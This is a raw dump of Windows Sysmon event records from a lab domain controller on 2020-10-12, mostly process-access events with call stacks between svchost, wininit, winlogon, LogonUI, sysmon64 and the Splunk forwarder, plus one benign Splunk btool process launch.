08:40:30.511{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1507-5F84-1300-000000007E01}1308C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000695Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:30.511{5D479F2C-1506-5F84-0C00-000000007E01}5721188C:\Windows\system32\svchost.exe{5D479F2C-1507-5F84-1300-000000007E01}1308C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000694Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:30.511{5D479F2C-1506-5F84-0C00-000000007E01}5721188C:\Windows\system32\svchost.exe{5D479F2C-1507-5F84-1300-000000007E01}1308C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000693Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:30.134{5D479F2C-160E-5F84-5800-000000007E01}1512748C:\Windows\servicing\TrustedInstaller.exe{5D479F2C-160E-5F84-5900-000000007E01}1636C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\combase.dll+6eba8|C:\Windows\servicing\TrustedInstaller.exe+43a2|C:\Windows\servicing\TrustedInstaller.exe+1d1d|C:\Windows\servicing\TrustedInstaller.exe+28c6|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000692Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:30.087{5D479F2C-1507-5F84-0E00-000000007E01}10921528C:\Windows\system32\LogonUI.exe{5D479F2C-1502-5F84-0700-000000007E01}716C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\logoncontroller.dll+2dfb5|C:\Windows\System32\RPCRT4.dll+581c4|C:\Windows\System32\RPCRT4.dll+39bd0|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000691Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:30.087{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1502-5F84-0700-000000007E01}716C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1a375|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000690Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:30.087{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1502-5F84-0700-000000007E01}716C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000689Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:30.087{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1502-5F84-0700-000000007E01}716C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000688Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:30.087{5D479F2C-1506-5F84-0C00-000000007E01}5721188C:\Windows\system32\svchost.exe{5D479F2C-1507-5F84-0E00-000000007E01}1092C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+163fd|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+d69b2|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000687Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:30.087{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1502-5F84-0700-000000007E01}716C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000686Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:30.087{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1503-5F84-0900-000000007E01}800C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+796b|c:\windows\system32\lsm.dll+2b2a|c:\windows\system32\SYSNTFY.dll+15cd|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+599c8|C:\Windows\System32\RPCRT4.dll+39257|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000685Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:30.087{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1503-5F84-0900-000000007E01}800C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|c:\windows\system32\SYSNTFY.dll+1ad9|C:\Windows\System32\RPCRT4.dll+581c4|C:\Windows\System32\RPCRT4.dll+39bd0|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001620Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.777{5D479F2C-16B2-5F84-3A00-000000007F01}37963816C:\Windows\system32\conhost.exe{5D479F2C-16B2-5F84-3F00-000000007F01}3892C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001619Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.777{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001618Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.777{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001617Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.777{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001616Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.777{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001615Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.777{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001614Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.777{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001613Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.777{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001612Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.777{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001611Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.777{5D479F2C-169F-5F84-0500-000000007F01}648796C:\Windows\system32\csrss.exe{5D479F2C-16B2-5F84-3F00-000000007F01}3892C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000001610Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.777{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001609Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.777{5D479F2C-16B2-5F84-3E00-000000007F01}38723876C:\Program Files\SplunkUniversalForwarder\bin\btool.exe{5D479F2C-16B2-5F84-3F00-000000007F01}3892C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+239c|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2568|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2926|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+11cf|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+1245|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+aa24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x80000000000000001608Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.783{5D479F2C-16B2-5F84-3F00-000000007F01}3892C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool web list settings --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{5D479F2C-169F-5F84-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{5D479F2C-16B2-5F84-3E00-000000007F01}3872C:\Program Files\SplunkUniversalForwarder\bin\btool.exebtool web list settings --no-log 10341000x80000000000000001607Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.777{5D479F2C-16B2-5F84-3A00-000000007F01}37963816C:\Windows\system32\conhost.exe{5D479F2C-16B2-5F84-3E00-000000007F01}3872C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001606Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.777{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001605Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 